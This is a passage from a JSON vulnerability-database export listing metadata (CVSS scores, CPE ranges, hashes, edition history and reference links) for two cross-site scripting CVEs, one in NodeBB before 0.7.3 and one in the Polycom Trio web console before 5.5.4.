"NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}, {"id": "CVE-2018-14935", "bulletinFamily": "NVD", "title": "CVE-2018-14935", "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "published": "2018-11-15T20:29:00", "modified": "2018-12-17T15:53:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "reporter": "cve@mitre.org", "references": ["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "cvelist": ["CVE-2018-14935"], "type": "cve", "lastseen": "2021-04-23T00:24:17", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "polycom:trio_8500", "name": "polycom trio 8500", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "polycom:trio_8500_firmware", "name": "polycom trio 8500 firmware", "operator": "lt", "version": "5.5.4"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:polycom:trio_8500_firmware:5.5.4:*:*:*:*:*:*:*", "versionEndExcluding": "5.5.4", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:h:polycom:trio_8500:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2018-14935"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:29", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:52:29", "rev": 2, "value": 2.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"}], "hash": "d4d79905e50cfb6e48dd674ae5341d64b163cb8df40dd57d55e959fb48894cb2", "hashmap": [{"hash": "165cab0c975d0c6f3ddb9c33f1f265cb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "a6c1c4faa2374c7f31296d64e21da942", "key": "title"}, {"hash": "89080accf6cf2e599523c9ff892c5a9c", "key": "href"}, {"hash": "a4963fe354f8e3d3c48600d4fac2d27f", "key": "affectedSoftware"}, {"hash": "f17f5e1017923b8a6a58f2bff5df6756", "key": "extraReferences"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "90f8a03631931182856b38c534747c10", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7a31a8a51ed9929ab53c20461b14c9a4", "key": "cpeConfiguration"}, {"hash": "a333073bc149ce256db3affe0b7de77e", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5ccefbbe6584d198368c716755892f5c", "key": "modified"}, {"hash": "5ce5e96d3f1002f25f8a89471bae53ab", "key": "affectedConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6616dc31f9ddee4c577b2d4383ce8d0a", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "id": "CVE-2018-14935", "immutableFields": [], "lastseen": "2021-02-02T06:52:29", "modified": "2018-12-17T15:53:00", "objectVersion": "1.5", "published": "2018-11-15T20:29:00", "references": ["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2018-14935", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:52:29"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "polycom:trio_8500", "name": "polycom trio 8500", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "polycom:trio_8500_firmware", "name": "polycom trio 8500 firmware", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:polycom:trio_8500_firmware:5.5.4:*:*:*:*:*:*:*", "versionEndExcluding": "5.5.4", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:h:polycom:trio_8500:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2018-14935"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:34:33", "references": [], "rev": 2}, "score": {"modified": "2020-11-30T00:34:33", "rev": 2, "value": 2.9, "vector": "NONE"}}, "hash": "0ec82b9540879e36f78762c388adf42cc6137f05cfd7ffa942462db9636d3366", "hashmap": [{"hash": "165cab0c975d0c6f3ddb9c33f1f265cb", "key": "published"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "a6c1c4faa2374c7f31296d64e21da942", "key": "title"}, {"hash": "89080accf6cf2e599523c9ff892c5a9c", "key": "href"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "90f8a03631931182856b38c534747c10", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7a31a8a51ed9929ab53c20461b14c9a4", "key": "cpeConfiguration"}, {"hash": "a333073bc149ce256db3affe0b7de77e", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5ccefbbe6584d198368c716755892f5c", "key": "modified"}, {"hash": "ccaec3077510f8dc1fe817b05d8a2d57", "key": "affectedSoftware"}, {"hash": "5ce5e96d3f1002f25f8a89471bae53ab", "key": "affectedConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6616dc31f9ddee4c577b2d4383ce8d0a", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "id": "CVE-2018-14935", "lastseen": "2020-11-30T00:34:33", "modified": "2018-12-17T15:53:00", "objectVersion": "1.3", "published": "2018-11-15T20:29:00", "references": ["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2018-14935", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:34:33"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "polycom:trio_8500", "name": "polycom trio 8500", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "polycom:trio_8500_firmware", "name": "polycom trio 8500 firmware", "operator": "lt", "version": "5.5.4"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:polycom:trio_8500_firmware:5.5.4:*:*:*:*:*:*:*", "versionEndExcluding": "5.5.4", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:h:polycom:trio_8500:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2018-14935"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:14", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:20:14", "rev": 2, "value": 2.9, "vector": "NONE"}}, "hash": "dec281edcc3c6157e38f99b69d0a258dbaa0cc472a5f88c8f75f08192410f210", "hashmap": [{"hash": "165cab0c975d0c6f3ddb9c33f1f265cb", "key": "published"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "a6c1c4faa2374c7f31296d64e21da942", "key": "title"}, {"hash": "89080accf6cf2e599523c9ff892c5a9c", "key": "href"}, {"hash": "a4963fe354f8e3d3c48600d4fac2d27f", "key": "affectedSoftware"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "90f8a03631931182856b38c534747c10", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7a31a8a51ed9929ab53c20461b14c9a4", "key": "cpeConfiguration"}, {"hash": "a333073bc149ce256db3affe0b7de77e", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5ccefbbe6584d198368c716755892f5c", "key": "modified"}, {"hash": "5ce5e96d3f1002f25f8a89471bae53ab", "key": "affectedConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6616dc31f9ddee4c577b2d4383ce8d0a", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "id": "CVE-2018-14935", "lastseen": "2020-10-03T13:20:14", "modified": "2018-12-17T15:53:00", "objectVersion": "1.3", "published": "2018-11-15T20:29:00", "references": 